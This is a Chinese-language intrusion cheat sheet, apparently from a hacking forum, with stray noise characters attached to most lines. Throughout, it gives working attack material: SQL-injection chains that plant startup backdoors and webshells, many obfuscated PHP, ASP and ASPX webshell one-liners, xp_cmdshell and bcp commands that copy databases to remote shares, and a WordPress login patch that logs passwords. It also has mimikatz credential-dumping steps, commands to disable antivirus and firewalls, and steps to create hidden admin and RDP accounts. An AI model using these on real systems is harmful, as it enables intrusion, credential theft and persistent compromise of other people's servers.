' W7 q/ T- ` H5 V& u8 E; e
中文版本操作系统中针对mysql添加用户完整代码:
! }2 F+ n1 a' o- x2 q! Q6 p( z( F+ K; K n- k3 m# T1 ]
use test;3 f: M# `. ^. R& H/ J5 s
create table a (cmd text);
7 }) }. ]' J- ainsert into a values ("set wshshell=createobject (""wscript.shell"") " );; V. e; Z& X+ x: S; x
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );+ @7 d3 j! ]3 r5 I- F
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
, L- v2 D: j5 N# sselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";0 N) U) ]7 ~, L
drop table a;
8 e" r# K2 F4 e; J' Z( P( }! g+ _+ R% J4 ?, i5 }
英文版本:
. C8 n5 j8 ^9 w3 T
5 y4 M/ b9 y* i3 ]9 a: I. wuse test;; k9 R, w/ c) Y+ Z
create table a (cmd text);
. X7 w Y. I9 r4 ~insert into a values ("set wshshell=createobject (""wscript.shell"") " );
" z. ]. Y! a0 Hinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " ); f* k! g5 C1 _9 o
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
( w) K: b" N/ Dselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";/ J1 M! m9 p7 v) G; H
drop table a;
3 p1 T6 f$ T& v
; L5 U \# X9 o! d4 i3 f) fcreate table a (cmd BLOB);% x/ ^+ b8 J3 P% e
insert into a values (CONVERT(木马的16进制代码,CHAR));
) {* q! D- r# t. H! jselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
: V. b6 m* B6 K' \& B6 Gdrop table a;0 E% Q, @7 }2 v) `( e% ^' Y
x' B+ ?' W# c5 x4 M. s0 G1 t
记录一下怎么处理变态诺顿
D8 J6 @2 d, A& M查看诺顿服务的路径
9 J# ~; L$ D# m0 p7 Zsc qc ccSetMgr
* w% [) V+ y9 D* X2 q然后设置权限拒绝访问。做绝一点。。/ D) L! e: z& J2 T" v+ C3 N$ I
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
. y% p- ]; I. b- d9 ?1 ~cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"5 a' F- u6 C# E
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
+ c, m1 r, L8 I& S. rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
: T+ o* }$ O% k% s# R5 M& p0 S
c1 ^5 t4 V1 R: d, c5 ] z然后再重启服务器
" z, Y$ Q+ T- j& e; z1 uiisreset /reboot
/ A; Q7 c [: O这样就搞定了。。不过完事后。记得恢复权限。。。。8 ] w8 ?4 D% D3 V! z& E
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F! d" Q7 [6 [) w$ w$ G! K& @
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
5 p& B6 Z" j9 O+ b9 P# n5 _% Jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F) F4 C, p3 I+ J4 w# B! \6 R7 U* y/ t) X
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F0 {$ g( E3 j7 i' e6 g
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
7 H7 O. ]4 D* [
' g. Y" I" @9 r- w- w' \7 L7 f$ zEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
6 K& u9 k' o ?- s2 V+ P8 u3 g! R3 D' \- M
postgresql注射的一些东西, l# Q2 c5 t8 v* j3 C
如何获得webshell5 H7 w# x c. q- Y" }3 {5 J
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
0 v9 `) }! X+ b2 Y- ^http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); ) M+ N, L8 C- q% `/ }# ~1 ?2 S
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
! v5 k- L7 N: G# p* Q5 x/ |. G0 _9 ^如何读文件0 u% y& t* x' i7 y
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);! g! ^: s$ u9 u4 G6 h- A; C
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
' J4 U. k$ z$ n% p( E# Whttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
2 ^3 {3 Q9 `! U. l% M1 `# w/ Z+ ]: [& F3 ^4 |" d
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
. D. a8 r4 _9 {+ r( [/ n当然,这些的postgresql的数据库版本必须大于8.X
6 @7 y C v9 C* `* `# W. p, S创建一个system的函数:9 g0 L% n5 [% A$ }0 k! ]' a Y
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
, t, H1 B2 u) y) z8 Q9 ~% z/ w. s1 J. a- x# ?1 d+ A! E% D
创建一个输出表:) s; l: K/ {1 N( u7 H4 j
CREATE TABLE stdout(id serial, system_out text)
) H* h& }7 X2 W" o# d1 a. [
7 u" y* t( N4 g" O0 w* q执行shell,输出到输出表内:. y6 T5 P' y, T
SELECT system('uname -a > /tmp/test')+ Y; m# t: e# X/ D9 V3 r
7 g+ a- ]& O; p7 z6 K1 w% O
copy 输出的内容到表里面;
. C; `7 ]. p! c" v0 x9 l, D3 T# TCOPY stdout(system_out) FROM '/tmp/test'
" E( z2 C" B: K" i& h, l' W* b5 ?7 x1 [0 Y) w; ?
从输出表内读取执行后的回显,判断是否执行成功
+ J6 `! \$ c' e% }
! f# r+ d% y" ESELECT system_out FROM stdout Z$ c; ^) z& @% h- S6 l+ j
下面是测试例子
/ b' X2 }6 f0 o' G
) Y* q% z) h1 H) O" A( k/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
$ ]+ I( Y! D% c; } K5 T
j4 H( c6 d x# l: v! S# {9 u% c8 S6 S/ {/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'- E* U7 t3 _6 r0 V9 l# y
STRICT --6 H1 O) N( A, ?- f2 u3 l% ~
; q$ G! V3 }) L3 _. Y0 x+ M" I7 c* l1 y/store.php?id=1; SELECT system('uname -a > /tmp/test') --
! }3 b. C3 B6 l: }, q1 d) a
/ ?' I# k" |0 \) G/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
0 B) |$ c: ~4 t( H! F) o
8 l- c. d; R' [7 P/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
7 @3 v" K; W2 s- ynet stop sharedaccess stop the default firewall
+ y. o: a0 f0 `2 Unetsh firewall show show/config default firewall. Z; S0 N- E1 I6 K; @
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall9 J5 o: K8 z2 _; ^
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall8 [! ?2 L9 b" G( q& ?
修改3389端口方法(修改后不易被扫出)3 I4 F; ]" u8 Z
修改服务器端的端口设置,注册表有2个地方需要修改- Q3 G9 R( W% n( e, ?
* u4 h$ J6 R' ?9 z7 b
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
4 o" S1 s6 C5 C0 _" j8 G9 L" GPortNumber值,默认是3389,修改成所希望的端口,比如6000
- }5 A% @. g( L& L" I9 I ~& u9 {& D# ^2 S5 k v
第二个地方:5 g V1 y/ m% r8 g& R/ f
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
5 N( w0 N1 [: BPortNumber值,默认是3389,修改成所希望的端口,比如6000/ v/ v+ x1 `9 p# s }4 C( ]7 M
- c" W) X' m$ [ R* r' `& g$ v
现在这样就可以了。重启系统就可以了; P$ m% P' G% T3 d
7 g1 L: S- }5 A# v# ?查看3389远程登录的脚本
6 s* W+ ^ M% U8 i0 h保存为一个bat文件7 U0 W& q. C1 C N( Z7 h T2 X2 V
date /t >>D:\sec\TSlog\ts.log
& A- u/ L- U) ~- y* b( s: X. Ftime /t >>D:\sec\TSlog\ts.log
I# @4 w' r: t# o2 y" Rnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
! E/ M& u/ d* s9 N, r9 Ustart Explorer
$ e7 a* E$ d5 m# j
; W, Y0 _8 W. Kmstsc的参数:
# B$ o: q; }! u1 @( l. h6 h$ \ B; b+ s+ U9 e' N$ ~
远程桌面连接* q' b0 e% a, }
* ^4 B4 g6 x4 w3 }' fMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]. y) i4 C% }' T2 r% G" a( U0 J S
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?. {! V' t3 u t) M: z1 s8 D# [$ i. r1 ^
: G/ o4 E. w% h/ o6 P<Connection File> -- 指定连接的 .rdp 文件的名称。7 P4 n; H8 R* c! S/ m
y2 Q7 w+ e3 d: [/v:<server[:port]> -- 指定要连接到的终端服务器。
% k4 Z0 b8 ?- R6 T& G8 ^
) n3 Z% w, z# r$ x* J/console -- 连接到服务器的控制台会话。: Q8 t4 H& i2 J" U8 @
1 ^+ d9 V2 E# S+ B% {/f -- 以全屏模式启动客户端。. [) _0 ]% `0 R- j0 {6 W
- M% k; w* T% u# y/ ]/w:<width> -- 指定远程桌面屏幕的宽度。
! ?# D" R3 n! F. V$ w( g2 c+ N; Y. W! Q& B$ ]" `7 @' m
/h:<height> -- 指定远程桌面屏幕的高度。
, K: ^& x; q* {6 f& \3 _1 d; D0 S4 ^
9 B: c2 I4 t# o r6 `/edit -- 打开指定的 .rdp 文件来编辑。
2 O- v+ C( j) c( n! Q ~- q
9 ^6 l0 L: c( P4 N3 H/migrate -- 将客户端连接管理器创建的旧版" W" o3 B+ n2 i1 {' x
连接文件迁移到新的 .rdp 连接文件。' z6 R& |3 E# p8 D+ U; |- l8 i" ^
1 B: D) |4 K9 P) V/ W2 {( {
6 j2 M& E* J5 ?$ G1 Z
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
/ m+ o+ ]) M' ]+ emstsc /console /v:124.42.126.xxx 突破终端访问限制数量
6 D% `& u& O9 q/ `5 c- M! F! p# @4 S
/ U, R+ o( p9 v命令行下开启33895 p' U3 ^4 D+ l. w
net user asp.net aspnet /add/ x# ~9 \) K: m; E9 v2 T# F; [, A
net localgroup Administrators asp.net /add
' r! A# b7 U4 ~/ M+ onet localgroup "Remote Desktop Users" asp.net /add
4 U2 g$ S2 O( Oattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D5 [% T5 g. O/ i5 N
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
5 D+ k6 v$ A& y' F4 }5 G& eecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
0 i7 s: [8 b1 m! w3 A- Q& kecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f; h0 \: E2 b% P: k, {7 S: R( A1 S
sc config rasman start= auto' T- W6 P. Y3 ^" }
sc config remoteaccess start= auto
6 l$ v% B& S* m9 x% d9 Mnet start rasman
5 ?8 W' o2 T) k& X5 y2 {3 ^net start remoteaccess
K7 M4 Z) J( ^) Q: ]Media
- p- r1 {- y& j9 _9 ~<form id="frmUpload" enctype="multipart/form-data"+ ~. \ g% r8 ]% i$ y
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
$ ~! D- f! a5 \+ T" P! ]<input type="file" name="NewFile" size="50"><br>
6 y6 Q# e$ K% k) m- J+ C8 S5 g9 S9 l<input id="btnUpload" type="submit" value="Upload">: V( n4 u0 R$ j
</form>
$ p8 B/ d1 G- X; ~0 h" Q! ], `' U/ q [8 E
control userpasswords2 查看用户的密码
4 K, i- x* I, ~3 |8 Aaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
3 w: q# G2 J" O4 M3 ]$ gSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
; M0 @2 _6 [0 L" E- W% e$ b* W1 t9 @8 E- R! I8 }: {- Z' @8 s: M
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:2 s: D) m' e0 ~# X
测试1:6 U- a; U. X! E$ a, _) R) |) S x
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
6 M1 m9 U% }7 c
6 M, H# ?4 f- a z' v1 j8 k" y测试2:- T: _7 P, q0 z q9 c
/ s5 {' v8 f' ecreate table dirs(paths varchar(100),paths1 varchar(100), id int)
/ [3 R+ w$ X% L6 q
2 \, g1 y# `. P q4 T5 w" |9 tdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
`0 f4 v- S- y$ ], a+ I6 T2 P, u6 X# H) `7 w
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
' T9 X% e/ r' Q6 [, h& D关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
4 J3 ?" ? D5 d6 |9 ~7 S$ E可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;& V$ x, b8 O7 |5 \
net stop mcafeeframework: n5 V$ o; H: Q5 ?/ D
net stop mcshield& x* @1 `5 e- h" O1 ]2 O
net stop mcafeeengineservice
+ O% y! i0 X3 J: Gnet stop mctaskmanager7 p3 ~2 N: h9 G( d) H- a
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
( _" u8 C, u1 C& D/ L+ O) C. R, v
VNCDump.zip (4.76 KB, 下载次数: 1)
: |2 P* ]4 S/ N; H: {- s2 d密码在线破解http://tools88.com/safe/vnc.php, L, K& C: r$ w8 z9 e" U
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取) e2 A+ `. X; s* W$ @
; o% L) t% h) S: J8 ~/ C% N) E3 }exec master..xp_cmdshell 'net user'4 e$ }6 l) o' q% f q T6 ~
mssql执行命令。2 Q2 K4 {' |! ~. r; `5 }; I
获取mssql的密码hash查询7 l. C; g0 d# Z, c& ~& T! P5 o' W
select name,password from master.dbo.sysxlogins
2 P) l+ t1 e) y4 U6 b4 b1 K- }& Q
8 u+ K: o% ~2 {7 ?2 Tbackup log dbName with NO_LOG;' D2 n* n7 d' I3 J: I
backup log dbName with TRUNCATE_ONLY;
9 x" {# p* c% Y: z0 N! E* O LDBCC SHRINKDATABASE(dbName);% A) k% L8 _7 T9 c$ I/ N
mssql数据库压缩
$ c* ^) {/ j, m# v2 ~9 r2 T) c# z- r% p% F$ f0 x
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
4 A: Y1 \. i% x' P* U0 }将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。' Q$ P( w3 o! x
! E M. s% D1 m7 p' ~' S3 z
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
x0 G4 }+ R' W* V5 _7 j备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak' k" `/ E' F' I
( a% p+ k$ o sDiscuz!nt35渗透要点:7 i( V$ `$ O2 S7 f- f4 @$ A
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
! o. f2 @* o5 {* A(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>8 k- Q: Y3 w! y8 a2 ^+ x
(3)保存。
: ]* r# F/ W7 M- V0 k6 L5 ~9 _# ](4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass6 ]8 P4 ]% k2 |/ _8 K( t
d:\rar.exe a -r d:\1.rar d:\website\( ]" _. r, C* J6 L
递归压缩website# K1 a6 e( z! g2 \
注意rar.exe的路径
( f1 i) z2 c9 e z% g
) o3 T* P! `( R% r- U! B! M) e" d" Z<?php4 i. y7 E' K' ?$ }1 d2 c/ r
5 ^) X4 ~- v0 v' ]( b$ u9 r
$telok = "0${@eval($_POST[xxoo])}";# g* W" s0 l! C0 p' K3 w
6 \. L5 |% x2 I, N5 v- X. g2 E$username = "123456";
W8 a# l" O- G+ L3 O" N6 k" b; Z0 o: r" T
$userpwd = "123456";
( n! g$ U, p, X8 p$ P2 t* @' `/ J( Z( {0 b& o M6 X* Z! I: Z" B
$telhao = "123456";
/ H3 ?& C9 O, m( \* Q) {/ r4 \1 j# G! R" j5 e- g
$telinfo = "123456";5 r6 ^% Y# i) W6 o- A6 ^
% J' ?3 @9 Y2 ]5 J) W& w3 H9 B?>
; I5 j4 C S! u* C2 `php一句话未过滤插入一句话木马0 t% n- t* N, b* _0 A
! d- K8 q% Z {' n& i) M站库分离脱裤技巧2 V1 x2 d0 v7 K% n
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
: t+ n1 k1 s8 P' [- }exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'& ]* Q$ r- S/ k$ e
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。( j- V* V2 s; {6 `9 \
这儿利用的是马儿的专家模式(自己写代码)。
& A* x p& n: k6 t0 _3 i* pini_set('display_errors', 1);' q; u6 _+ m5 r0 N
set_time_limit(0);
9 g; t" F+ ]+ q- u- Q- derror_reporting(E_ALL);6 y) \# }& K$ M5 S
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
) O1 V6 r# {9 e5 y9 Rmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());- N R$ G+ i( F
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());8 e3 F/ ?. u/ E; |
$i = 0;
+ c. o# ^6 Z9 A, o$tmp = '';
% ?; y' v. E+ b# a5 N8 ~6 owhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {5 M4 ]: s! ?5 L5 ^' x: x$ K
$i = $i+1;
( A- ~5 C7 v/ t# p# ^* B $tmp .= implode("::", $row)."\n";
2 Q( i: S! X) a+ A if(!($i%500)){//500条写入一个文件6 C) H& Y c/ p3 m- W; c* A
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
1 R/ C7 W" O; v9 ] file_put_contents($filename,$tmp);
/ Z$ Z' T9 p$ X2 h $tmp = '';
5 o _- c$ ~0 }2 F. `; a2 \" [ }
+ E y/ [' z5 J5 {}
% O9 l B5 a j2 t" ^mysql_free_result($result);2 r6 o( o% @* c% @) ^
% X. I' \) g& h a# ]3 b; o
, Y8 ~& y K2 e7 P
I* X! g$ M8 m: k//down完后delete
# Y c6 u" D; f0 q! [+ Z6 U6 B/ x& G& z- [% i# s( l
4 v2 I. C& O- m) x0 W0 O% ~
ini_set('display_errors', 1);
9 J% G' W) |+ R' Yerror_reporting(E_ALL);- x# v7 `" L Z9 W
$i = 0;
# [+ l F( L8 Qwhile($i<32) {8 t0 |) [7 Z& Z* b. ]2 ]3 F
$i = $i+1;
) S* C- |% i6 W! Q' \$ i $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
0 O2 }# i% o& @% x7 X; |/ X$ e unlink($filename);
( g& A" o6 F6 K K}
1 x! R/ f; C: f" v9 B$ ]/ qhttprint 收集操作系统指纹
5 p' ^7 g& N! k+ |1 G! {# I& @扫描192.168.1.100的所有端口# \ ~/ ]4 `) h6 @$ @# ]& l
nmap –PN –sT –sV –p0-65535 192.168.1.100
7 i+ g) h: h8 G; e; ~* g) mhost -t ns www.owasp.org 识别的名称服务器,获取dns信息
. U1 o8 T6 m0 B, bhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
+ C3 G8 s' \6 Q! l% M3 SNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
% h3 T& }7 E8 m5 ?* z; I$ q
+ ?3 S; c8 j- I* h) U+ M% PDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
$ p- W. d3 A) ^1 Z2 q% J: B1 ]9 W F g& z1 E) p# o7 c+ Z
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)' n3 I$ ?4 x, u U. m8 T2 }" \
1 j' s R( b# C0 x1 n
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
# D# i, A- |' U7 M5 _
+ q8 x( q& B, O7 f4 } DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)$ w! ]; [8 K1 @6 q' d5 T" Y
- M# A) n- E% G2 H/ [3 \
http://net-square.com/msnpawn/index.shtml (要求安装)+ z( I: j; v6 w) _7 b* e' `4 T
0 L$ j5 \2 x0 q! ?; Z) } tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
& k( n R! Y) }8 C) z7 P; _: g/ B K/ y9 V' c5 C6 ?
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
3 L. N: |: `4 s. V' `: `set names gb23125 u" p' C/ S* T& j3 c# I
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。# w/ ^1 t1 A3 l# R: y: t8 K
" v5 o L7 ^9 e$ u# x
mysql 密码修改
0 P. d( i& ^+ |% EUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” ) b1 R. Q' [6 T" d
update user set password=PASSWORD('antian365.com') where user='root';
) v$ `' A' R- J8 P3 R* ?flush privileges;
' k5 ?2 F8 X- {0 t0 a! l高级的PHP一句话木马后门4 @" c1 p: j* _4 n) ]
4 F/ p" p0 K) S% j7 }2 O入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀, P* O0 J1 |1 I! U8 [+ ~# ~5 Q
: y7 I- i- }; M6 m. n% n# R8 W& Q1、
6 k9 x: m; J+ H. g) l/ K. Z$ P5 }' @
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
" u) l$ m: A! D5 L `) k4 S; x( }: g& s9 F p
$hh("/[discuz]/e",$_POST['h'],"Access");
, g2 J6 W/ V% o% J' G2 i/ Y: c
^; q, E8 n2 r( Z//菜刀一句话7 ~* S0 Z2 S7 D5 w
8 N! @7 j8 F( P7 q2 `0 {/ I. W6 h
2、+ U( ]5 |' \& a$ V- N" m; l
" f3 u! U4 }! u# b$filename=$_GET['xbid'];
( s% N% D. ^) q9 d/ c* Y+ `6 F3 v- L( K+ q: S
include ($filename);
2 ~( Z; F# T; M6 ]6 a) O2 r9 O4 d" A5 z1 e
//危险的include函数,直接编译任何文件为php格式运行
, _( |* s# y' Z# N/ A( ~
4 n+ u/ x4 D- P1 |: H7 h( |3、: t2 x0 I$ ^3 \5 R5 \0 _; A
5 Z I* ?: ]& P: b( G7 V
$reg="c"."o"."p"."y";
$ \. k+ r( |5 F w- k4 Z) ]
a% h$ |% g! K, }+ _# F$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
1 N, T8 [4 B5 r, {6 ?2 c" R5 Z# e" J+ f
//重命名任何文件5 q E5 @5 r: e+ |) c6 Y3 |( G
: }, ? \" q9 D; l1 G4、2 [' F( N/ B! `' B9 j
4 K' o/ X/ p4 O1 b$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
2 G- Z1 v) R) \$ y$ ?$ I. s6 ` @1 I7 o1 m8 @
$gzid("/[discuz]/e",$_POST['h'],"Access");+ g' U u7 s. g8 t: C
! l! m5 T# v6 b8 L+ f. j7 i5 S//菜刀一句话, C7 R8 f$ h+ A4 W- v0 D
& w+ Q* t7 p4 T5 r4 Q/ a* D
5、include ($uid);9 V) ?6 @' S, l+ u9 I$ R
2 f$ x! }9 B5 n4 c) J/ y//危险的include函数,直接编译任何文件为php格式运行,POST 3 X$ Z9 Q2 x, J
, J+ n2 `" m% i9 n+ d1 q7 Z A8 ?7 F# @' w
//gif插一句话2 g+ b1 r6 o: \4 s( \
' {* S6 n9 q5 v5 {6、典型一句话
4 E7 u+ L* h/ v& B
0 s% I/ m" D( S3 g. U: m5 x; F程序后门代码% C z4 x' u7 Y3 H* p; {
<?php eval_r($_POST[sb])?>" w1 h# |+ f* M7 s) n& `& a( y. A# V
程序代码 F2 L" q; S9 k! C) n' H
<?php @eval_r($_POST[sb])?>9 f& t# h/ ?* z4 Q% ~5 l! ]
//容错代码
( [" V3 F- W3 R5 S4 n程序代码
' }# W: M2 a$ P<?php assert($_POST[sb]);?>1 N- [2 q- o) X
//使用lanker一句话客户端的专家模式执行相关的php语句2 v" X1 Z3 b$ n. o$ M" ~0 X" q
程序代码
" w5 x7 u9 \# O/ G; C<?$_POST['sa']($_POST['sb']);?>
; w7 Z8 p- P* V8 o5 o程序代码! j3 q, ?5 `9 V
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
2 ^' v4 z4 D* m. j$ i程序代码
6 w+ l" V5 g: U* d# w9 o# r<?php
7 K8 t0 P. O+ p@preg_replace("/[email]/e",$_POST['h'],"error");
/ g3 y6 b: Y4 Q: y: ]?>
( U# c, D, ^" {+ R/ l. R//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
/ o( j+ l* g% H程序代码
! R1 C. E( n m<O>h=@eval_r($_POST[c]);</O>& S2 b6 D/ g% Q7 ]
程序代码
. C$ X( }, }# h% ]# z% T; ^<script language="php">@eval_r($_POST[sb])</script>. L% R' A' Z4 A+ z$ _/ u- F' a
//绕过<?限制的一句话
. v$ @" c& O( v# D
! ~" _2 q, q/ c/ `http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip& K: S& s2 v+ H( H; e
详细用法:7 N/ {6 h- G4 P! B5 o
1、到tools目录。psexec \\127.0.0.1 cmd8 N! ]( F3 G" c- z; w
2、执行mimikatz
( R7 |/ M$ h. I3、执行 privilege::debug
) c O: o* `4 k4 x% P4、执行 inject::process lsass.exe sekurlsa.dll( ]- ^; Q' ]0 E8 q1 f
5、执行@getLogonPasswords5 F- I3 [( r. b
6、widget就是密码3 O" ]9 V, a5 `$ A
7、exit退出,不要直接关闭否则系统会崩溃。! U" f+ Z+ k8 i) ^* O; U1 l$ Z
3 X2 y/ W' B1 _) h+ i
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面3 I1 o2 ^4 n+ R' a9 ~
/ B8 r8 k% z5 I
自动查找系统高危补丁* f. b, N' o5 J* B
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt2 e2 f( I+ n9 m7 F, p' e! P
4 D: C1 c% o9 E* j突破安全狗的一句话aspx后门* j+ Z S8 R: i% [6 W7 P& f
<%@ Page Language="C#" ValidateRequest="false" %>, M$ t, a$ c y; \6 O; \
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
5 A; t- g, [1 b* ewebshell下记录WordPress登陆密码 l5 F4 l0 V5 D: B7 N! B
webshell下记录Wordpress登陆密码方便进一步社工
3 j; L- O5 H! \4 k在文件wp-login.php中539行处添加:, o# i9 \/ t- s' v
// log password3 K0 r {2 b' a! I
$log_user=$_POST['log'];
6 n' X! ?6 y1 i* C' j0 S$log_pwd=$_POST['pwd'];9 F% D& k/ X2 |( M" M! Z
$log_ip=$_SERVER["REMOTE_ADDR"];
U; `* C( I) k6 ]6 ^' ~$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
7 K: I( j6 G& }. s- I$ x$txt=$txt.”\r\n”;0 Q' o6 a4 M' K+ n' w
if($log_user&&$log_pwd&&$log_ip){
0 p1 e' V, s8 J@fwrite(fopen(‘pwd.txt’,”a+”),$txt);3 V! e8 x0 |+ m. q- N( _
}4 h( c* `! ?2 I
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
9 ~& F* L* n% a; `* a; |就是搜索case ‘login’: o2 F- B9 e1 x% [. Y( ^
在它下面直接插入即可,记录的密码生成在pwd.txt中,. ]' D! X/ ^; |, k# [$ L
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录" m/ `6 f# ^5 P! ~
利用II6文件解析漏洞绕过安全狗代码:
* ~- o9 `1 v& k6 l% z( e;antian365.asp;antian365.jpg
